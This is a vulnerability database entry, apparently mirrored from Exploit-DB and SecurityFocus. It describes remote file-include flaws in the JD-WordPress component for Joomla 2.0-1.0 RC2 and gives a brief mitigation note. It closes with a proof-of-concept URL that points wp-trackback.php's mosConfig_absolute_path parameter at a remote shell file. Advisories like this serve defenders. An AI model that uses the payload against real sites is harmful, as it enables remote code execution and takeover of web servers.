header-logo
Suggest Exploit
vendor:
JD-WordPress
by:
SecurityFocus
7.5
CVSS
HIGH
Remote File-Include Vulnerabilities
98
CWE
Product Name: JD-WordPress
Affected Version From: 2.0-1.0 RC2
Affected Version To: 2.0-1.0 RC2
Patch Exists: NO
Related CWE: N/A
CPE: a:joomla:jd-wordpress
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

JD-WordPress for Joomla Remote File-Include Vulnerabilities

JD-WordPress for Joomla is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/19209/info
  
JD-WordPress for Joomla is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
  
An attacker can exploit these issues to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and to gain access to the underlying system.
  
Version 2.0-1.0 RC2 is vulnerable to these issues; prior versions may also be affected.

http://web/components/com_jd-wp/wp-trackback.php?mosConfig_absolute_path=http://shell.txt